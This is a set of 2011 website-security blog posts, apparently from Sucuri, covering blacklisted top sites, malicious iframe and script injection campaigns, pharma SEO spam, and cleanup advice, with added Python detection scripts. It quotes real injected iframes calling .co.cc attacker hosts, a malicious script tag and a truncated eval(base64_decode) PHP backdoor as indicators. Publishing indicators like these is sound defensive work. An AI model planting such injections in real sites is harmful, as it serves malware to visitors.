Alexa top sites – Blacklist for January/2011

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For Jan-2011 the number is fairly typical, but a little lower than in previous months. Out of those top 1 million sites, around 1.4k had their main domain blacklisted (1,447 to be exact). Compared to previous months there is a visible decline (2.1k in Dec, 2.5k in Nov, 3k in Oct, etc).

Why the decline? I would hope it is related to a safer Internet and people taking security more seriously, but based on the latest malware we have been analyzing, it seems the attackers are able to hide from Google pretty well (by not serving the malware to Google’s IP addresses or user agents, etc).

These are the top 100 sites that were flagged, with their respective rankings (you can get the full list here):


The attack from the .cc’s domains

Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

This is what it looks like on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width="1" height="1">

or

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width="1" height="1">

The number of domains being used in this attack is quite large, and only a few of them are blacklisted by Google, but we have identified at least these:


They change quite often, but on a hacked site the signs are the same: redirects to malicious .cc sites and the following PHP code added to index.php (along with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard: remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn’t add). If you need help doing that (or need someone to do it for you), we offer website malware removal / clean-up services.
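As an added example (not code from the post), a small Python scanner for the two indicators this post describes, the eval(base64_decode()) wrapper in index.php and the hidden 1x1 iframe pointing at a .co.cc/.vv.cc/.cz.cc host; the regexes, the demo web root and the hostname bad-example.vv.cc are constructed for the example.

```python
import os
import re
import tempfile

# Indicators from the post: eval(base64_decode()) wrapper and a .co/.vv/.cz.cc iframe (regexes are mine)
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
CC_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?https?://([\w.-]+\.(?:co|vv|cz)\.cc)[^>]*>",
    re.IGNORECASE,
)
TINY_RE = re.compile(r"\b(?:width|height)\s*=\s*['\"]?1['\"]?(?![\d%])", re.IGNORECASE)  # exactly 1

def find_indicators(text):
    """Return (indicator, detail) tuples found in one file's contents."""
    hits = []
    if EVAL_B64_RE.search(text):
        hits.append(("eval_base64", "eval(base64_decode(...)) wrapper"))
    for m in CC_IFRAME_RE.finditer(text):
        size = "1x1" if len(TINY_RE.findall(m.group(0))) == 2 else "other"
        hits.append(("cc_iframe", f"{m.group(1)} ({size})"))
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root; map each file that has indicators to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_indicators(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

def demo():
    """Build a constructed web root (two infected files, one clean) and scan it."""
    root = tempfile.mkdtemp()
    samples = {  # hostname and payload are constructed, not real indicators
        "index.php": '<?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw==")); ?>',
        "wp-content/footer.html": '<iframe src="http://bad-example.vv.cc/a" width="1" height="1"></iframe>',
        "about.html": "<p>A clean page with no injected markup.</p>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)
```

Run demo() to see the report; on a real site point scan_tree at the document root and treat every hit as a file to inspect, not as proof the rest of the tree is clean.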

We will post more details /updates as we learn more.

Hilary Kneber Strikes Again – welcometotheglobalisnet

It seems that after a few quiet months, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber-style attacks affecting GoDaddy shared hosts: they modify every PHP file and the database to make sure every page on the infected site loads malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src="http://welcometotheglobalisnet.com/js.php?kk=25"></script>

Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

The malware infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet, so the risk is very high for everyone visiting an infected site.

What happens when someone clicks an infected site?

What the malware does is very simple: it contacts a few domains:


UCalgary web sites compromised with spam

We were cleaning up a compromised site today (with the infamous pharma hack) when we saw multiple spam links on the hacked site pointing to ucalgary.ca (a large Canadian university). What was interesting is that they were not pointing to a small department sub-domain, but to the main site.

This means attackers were using domains at the University of Calgary to increase their PR (page rank) and sell pharmacy-related products online.

These were some of the links on their main site that were being used (still live):


Thailand official foreign affairs / embassy web sites hacked

The Royal Thai (Thailand’s) consulate and embassy web sites (part of their foreign affairs ministry) are currently hacked and infected with a lot of spam (of the pharmacy kind).

Their website is located at http://www.mfa.go.th, and a quick scan (using our scanner) shows all the hidden content:

In addition, all their pages have multiple hidden links used in blackhat SEO spam campaigns:


Cleaning up an infected website – Part I: WordPress and the Pharma Hack

We deal with infected websites on a daily basis, and the most common question we get is how we clean them. What steps do we take? What should you do if you want to clean up your site after it gets infected?

This is part one of a small series of posts showing how to clean up sites. Because of its popularity, we will start with cleaning up the “Pharma Hack” on a WordPress-driven site. You can follow the series here: http://blog.sucuri.net/category/guides.

*Note that this post covers website clean-up only (mostly applicable to shared servers). If you have a dedicated server (or VPS), there are additional steps to secure it that are not covered here.
**If the items in this post are more than you want to take on, we are here to help. Visit Sucuri or email us at support@sucuri.net


1- Detecting (discovering) that you are hacked

This is the most important step. Most people don’t realize they’ve been compromised; here are a couple of things you can do to check your site:

Fire up Google and search for “site:yoursite.com”. Check whether any strange titles or spammy results are returned. If you see Viagra, Cialis or any other flavor of medicine in Google’s results for your site, you’re probably dealing with the Pharma Hack.

If you’re not sure after checking Google, use http://sitecheck.sucuri.net to run a scan. Type your domain name, and if it detects the Pharma Hack (or any other malware) you will see an alert:


Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number of Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected websites. Most of them are small and running old, vulnerable versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file, which contacts 188.72.201.11 and 209.160.33.108 to retrieve the list of links to display:


Weekly Malware Update – 2010/Feb/11

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

Pharma / Blackhat SEO Spam by stat-tracker.info and others

We are tracking a large number of websites that got hacked and are redirecting users to pharmacy-related domains. All the sites had the following code added to their PHP files:

The code redirects the user only if they arrived from a search engine. Domains used in these attacks (among many others):


They just act as intermediaries before sending the user to sites like http://centerpills.com/ and similar (which sell fake pharmacy-related products).

For hosting providers, I recommend blocking the following IP addresses: 178.238.134.8, 194.28.172.37 and 88.198.16.186.

All the infected sites had old/vulnerable versions of web applications running, so make sure to keep your sites updated!


To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

Something is wrong at WordPress.com / CNN.com

Update: The problem is now fixed; it seems to have been caused by a redirection error.

Many of the (CNN) VIP sites at WordPress.com are redirecting to http://superfantastically.com/. This includes politicalticker.blogs.cnn.com, popwatch.ew.com, tech.fortune.cnn.com and many others…

$ curl -D - http://politicalticker.blogs.cnn.com/
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 11 Feb 2011 16:35:41 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
Location: http://superfantastically.com/
Content-Length: 0

$ curl -D - http://popwatch.ew.com/
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 11 Feb 2011 16:36:28 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
Location: http://superfantastically.com/
Content-Length: 0
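An added example, not from the post: a Python check that parses header dumps like the two above and groups requested sites by the off-site host they redirect to, which is how a mass redirect like this one stands out. The two dumps are copied from the post; the third response and the host example.com are constructed for contrast.

```python
from urllib.parse import urlsplit

# Raw 'curl -D -' header dumps: the first two are copied from the post above,
# the third is a constructed healthy response for contrast.
RAW_RESPONSES = {
    "http://politicalticker.blogs.cnn.com/": (
        "HTTP/1.1 301 Moved Permanently\nServer: nginx\n"
        "Date: Fri, 11 Feb 2011 16:35:41 GMT\nContent-Type: text/html\n"
        "Connection: close\nVary: Cookie\n"
        "Location: http://superfantastically.com/\nContent-Length: 0\n"
    ),
    "http://popwatch.ew.com/": (
        "HTTP/1.1 301 Moved Permanently\nServer: nginx\n"
        "Date: Fri, 11 Feb 2011 16:36:28 GMT\nContent-Type: text/html\n"
        "Connection: close\nVary: Cookie\n"
        "Location: http://superfantastically.com/\nContent-Length: 0\n"
    ),
    "http://example.com/": "HTTP/1.1 200 OK\nServer: nginx\nContent-Type: text/html\n",
}

def parse_headers(raw):
    """Parse a raw response header block into (status_code, {lowercase name: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers

def check_redirect(requested, raw):
    """Return (status, target_host); target_host is None unless it differs from the requested host."""
    status, headers = parse_headers(raw)
    if status not in (301, 302, 303, 307, 308) or "location" not in headers:
        return status, None
    src = urlsplit(requested).hostname
    dst = urlsplit(headers["location"]).hostname
    # same-host redirects (trailing slash, http->https) are normal and ignored
    return status, (dst if dst and dst != src else None)

def cluster_offsite_redirects(responses):
    """Group requested URLs by the off-site host they land on; many unrelated sites funnelling into one host is the pattern above."""
    clusters = {}
    for url, raw in responses.items():
        _, target = check_redirect(url, raw)
        if target:
            clusters.setdefault(target, []).append(url)
    return clusters
```

Feed cluster_offsite_redirects a dict of sites you monitor and their header dumps; a single unexpected host collecting many sources is the signal to investigate, whether the cause is a misconfiguration (as here) or an injected redirect.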



WordPress 3.0.5 is available (with security fixes)

If you use WordPress, we recommend updating to the latest version (3.0.5) as soon as possible, especially if you have multiple users with authoring/contributing roles. This is the summary from WordPress.org:

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

The release addresses a number of issues and provides two additional enhancements:

- Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

- One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

- Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in a previous release.

You can download it here: http://wordpress.org/download/